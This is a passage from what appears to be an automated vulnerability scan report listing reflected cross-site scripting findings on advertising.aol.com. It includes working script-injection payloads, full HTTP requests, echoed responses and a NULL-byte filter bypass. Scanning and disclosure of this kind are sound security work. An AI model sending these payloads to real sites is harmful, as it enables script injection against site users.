<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/nai/nai.phpc40c6"><script>alert(1)</script>dfa626667ea?action_id=3" />
...[SNIP]...

4.65. http://advertising.aol.com/nai/nai.php [action_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/nai/nai.php

Issue detail

The value of the action_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %0060c4f'><script>alert(1)</script>607e346f05e was submitted in the action_id parameter. This input was echoed as 60c4f'><script>alert(1)</script>607e346f05e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /nai/nai.php?action_id=3%0060c4f'><script>alert(1)</script>607e346f05e HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13896

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=3.60c4f'><script>alert(1)</script>607e346f05e&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=8281580' height='1' width='1'>
...[SNIP]...

4.66. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/0/2/1812733584/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbdd"-alert(1)-"56c415e6812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bfbdd"-alert(1)-"56c415e6812/0/2/1812733584/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:15:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:15:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/bfbdd"-alert(1)-"56c415e6812/0/2/1812733584/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.67. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/0/2/1812733584/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b81e"><script>alert(1)</script>15b2c30d857 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7b81e"><script>alert(1)</script>15b2c30d857/0/2/1812733584/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:15:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:15:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/7b81e"><script>alert(1)</script>15b2c30d857/0/2/1812733584/" />
...[SNIP]...

4.68. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/0/3/295357155/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c934"-alert(1)-"95baf5a60d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /4c934"-alert(1)-"95baf5a60d2/0/3/295357155/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4c934"-alert(1)-"95baf5a60d2/0/3/295357155/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.69. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/0/3/295357155/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc591"><script>alert(1)</script>5fdf988b5f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cc591"><script>alert(1)</script>5fdf988b5f6/0/3/295357155/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/cc591"><script>alert(1)</script>5fdf988b5f6/0/3/295357155/" />
...[SNIP]...

4.70. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/1/1/819977518/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bbcc"-alert(1)-"5e9b9073576 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /7bbcc"-alert(1)-"5e9b9073576/1/1/819977518/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7bbcc"-alert(1)-"5e9b9073576/1/1/819977518/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.71. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/1/1/819977518/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b471f"><script>alert(1)</script>eb118a49685 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b471f"><script>alert(1)</script>eb118a49685/1/1/819977518/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b471f"><script>alert(1)</script>eb118a49685/1/1/819977518/" />
...[SNIP]...

4.72. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/1/3/1696897902/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35087"><script>alert(1)</script>a361881a94b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /35087"><script>alert(1)</script>a361881a94b/1/3/1696897902/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/35087"><script>alert(1)</script>a361881a94b/1/3/1696897902/" />
...[SNIP]...

4.73. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/1/3/1696897902/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caa83"-alert(1)-"7556a413751 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /caa83"-alert(1)-"7556a413751/1/3/1696897902/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/caa83"-alert(1)-"7556a413751/1/3/1696897902/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.74. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/2/2/1032347115/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd412"><script>alert(1)</script>b937435e28d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bd412"><script>alert(1)</script>b937435e28d/2/2/1032347115/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/bd412"><script>alert(1)</script>b937435e28d/2/2/1032347115/" />
...[SNIP]...

4.75. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/2/2/1032347115/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ac5"-alert(1)-"2fff1594f74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /28ac5"-alert(1)-"2fff1594f74/2/2/1032347115/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/28ac5"-alert(1)-"2fff1594f74/2/2/1032347115/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.76. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/2/3/1397978719/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5869"-alert(1)-"7954e14cf3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /e5869"-alert(1)-"7954e14cf3a/2/3/1397978719/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
